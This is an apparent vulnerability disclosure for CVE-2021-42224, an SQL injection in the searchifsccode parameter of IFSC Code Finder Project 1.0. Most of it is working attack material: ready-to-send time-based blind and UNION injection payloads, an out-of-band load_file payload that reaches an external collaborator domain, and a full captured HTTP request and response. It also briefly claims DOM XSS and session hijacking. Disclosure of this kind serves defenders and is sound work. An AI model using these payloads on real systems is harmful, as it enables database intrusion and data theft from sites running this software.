CVE-2021-42224
Vendor
Description:
- vulnerability:
all or nothing
SQL Injection vulnerability exists in IFSC Code Finder Project 1.0 via the searchifsccode POST parameter in /search.php. The searchifsccode parameter appears to be vulnerable to SQL injection attacks. The test payload '+(select load_file('\\bp4frncin7wvtb1vnxr1n6ngh7n0bzzq2eu1kp9.nu11secur1tycollaborator.net\ing'))+' was submitted in the searchifsccode parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. Also the parameter "searchifsccode" from search.php is XSS-Dom vulnerable plus PHPSESSID hijacking.
SQL injection Types
---
Parameter: searchifsccode (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: searchifsccode=849487'+(select load_file('\\\\bp4frncin7wvtb1vnxr1n6ngh7n0bzzq2eu1kp9.nu11secur1tycollaborator.net\\ing'))+'') AND (SELECT 1445 FROM (SELECT(SLEEP(5)))EBDq) AND ('ubep'='ubep&search=%C2%9E%C3%A9e
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: searchifsccode=849487'+(select load_file('\\\\bp4frncin7wvtb1vnxr1n6ngh7n0bzzq2eu1kp9.nu11secur1tycollaborator.net\\ing'))+'') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176766b71,0x624a5562647364654b616a684c6d546a427263576377794168415561525872414e53664d6a6e6444,0x7171786271),NULL-- -&search=%C2%9E%C3%A9e
---Mysql Request:
POST /IFSC%20Code%20Finder%20Project%20Using%20PHP/ifscfinder/search.php HTTP/1.1
Host: 192.168.1.180
Origin: http://192.168.1.180
Cookie: PHPSESSID=jmir9unlgf2inpr758uva4ruhb
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.180/IFSC%20Code%20Finder%20Project%20Using%20PHP/ifscfinder/
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 42
searchifsccode=849487'%2b(select%20load_file('%5c%5c%5c%5cbp4frncin7wvtb1vnxr1n6ngh7n0bzzq2eu1kp9.nu11secur1tycollaborator.net%5c%5cing'))%2b'&search=%C2%9E%C3%A9eMySQL Response:
HTTP/1.1 200 OK
Date: Thu, 14 Oct 2021 07:02:37 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 7797
Connection: close
Content-Type: text/html; charset=UTF-8
<!doctype html>
<html class="no-js" lang="en">
<head>
<!--====== Title ======-->
<title>IFSC Code Finder Portal | Home</title>
<!--====== Slick CSS ======-->
<link
...[SNIP]...